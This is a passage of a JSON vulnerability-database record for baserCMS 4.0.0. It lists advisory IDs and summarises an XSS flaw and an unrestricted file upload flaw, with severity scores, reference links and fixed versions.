vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6"}],"aliases":["CVE-2017-10844","GHSA-69gw-v5ph-6vxq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y9f3-k7xk-rucf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91645?format=json","vulnerability_id":"VCID-zqd4-rdem-jfgk","summary":"baserCMS has a cross-site scripting vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.1 and earlier versions\n\n### Vulnerability\n\nMalicious Javascript may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_20837860\n\n### Credits\n\nGai Tanaka@Mitsui Bussan Secure Directions, Inc.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30879","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01615","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30879"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30879","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30879"},{"reference_url":"https://github.com/advisories/GHSA-jmq3-x8q7-j9qm","reference_id":"GHSA-jmq3-x8q7-j9qm","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jmq3-x8q7-j9qm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30879","GHSA-jmq3-x8q7-j9qm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44709?format=json","vulnerability_id":"VCID-zsgc-fnen-b7a6","summary":"Unrestricted Upload of File with Dangerous Type\nbaserCMS is a Content Management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-25655","reference_id":"","reference_type":"","scores":[{"value":"0.00561","scoring_system":"epss","scoring_elements":"0.68669","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00561","scoring_system":"epss","scoring_elements":"0.6871","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-25655"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"}],"url":"https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100"},{"reference_url":"https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"}],"url":"https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-25655","reference_id":"CVE-2023-25655","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-25655"},{"reference_url":"https://github.com/advisories/GHSA-mfvg-qwcw-qvc8","reference_id":"GHSA-mfvg-qwcw-qvc8","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-mfvg-qwcw-qvc8"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8","reference_id":"GHSA-mfvg-qwcw-qvc8","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64369?format=json","purl":"pkg:composer/baserproject/basercms@4.7.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5"}],"aliases":["CVE-2023-25655","GHSA-mfvg-qwcw-qvc8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zsgc-fnen-b7a6"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.0"}